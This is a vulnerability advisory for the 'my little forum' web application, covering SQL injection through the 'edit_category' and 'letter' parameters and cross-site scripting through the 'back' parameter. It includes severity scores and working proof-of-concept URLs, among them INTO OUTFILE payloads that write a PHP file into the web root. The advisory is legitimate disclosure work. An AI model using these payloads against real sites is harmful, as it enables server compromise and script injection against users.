6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.016 Low
EPSS
Percentile
85.7%
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in my little forum, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks. The SQL injection vulnerabilities have medium risk assigned as they can be exploited under administrator account or via XSRF vector.
1.1 Input passed via the “edit_category” HTTP GET parameter to “/index.php” script is not properly sanitised before being used in SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Simple PoC code below will create a file in web root with phpinfo() function (if MySQL has enough privileges, and current web user can write into the directory):
http://[host]/index.php?mode=admin&edit_category=’ UNION SELECT 1,2,3,‘<? phpinfo() ?>’ INTO OUTFILE ‘/var/www/file.php’ –
1.2 Input passed via the “letter” HTTP GET parameter to “/index.php” script is not properly sanitised before being used in SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Simple PoC code below will create a file in web root with phpinfo() function (if MySQL has enough privileges, and current web user can write into the directory):
http://[host]/index.php?mode=admin&action=user&letter=’ UNION SELECT ‘<? phpcode() ?>’ INTO OUTFILE ‘/var/www/file.php’ –
Both vulnerabilities require administrative privileges, however can be also exploited via XSRF vector to which the application is also vulnerable.
2.1 Input passed via the “back” GET parameter to “/index.php” is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC below uses JS “alert()” function to display a pop-up with “ImmuniWeb”:
http://[host]/index.php?delete_posting=1&mode=posting&back=%22%3E%3Cscript%3 Ealert%28/ImmuniWeb/%29;%3C/script%3E
CPE | Name | Operator | Version |
---|---|---|---|
my little forum | le | 2.3.3 |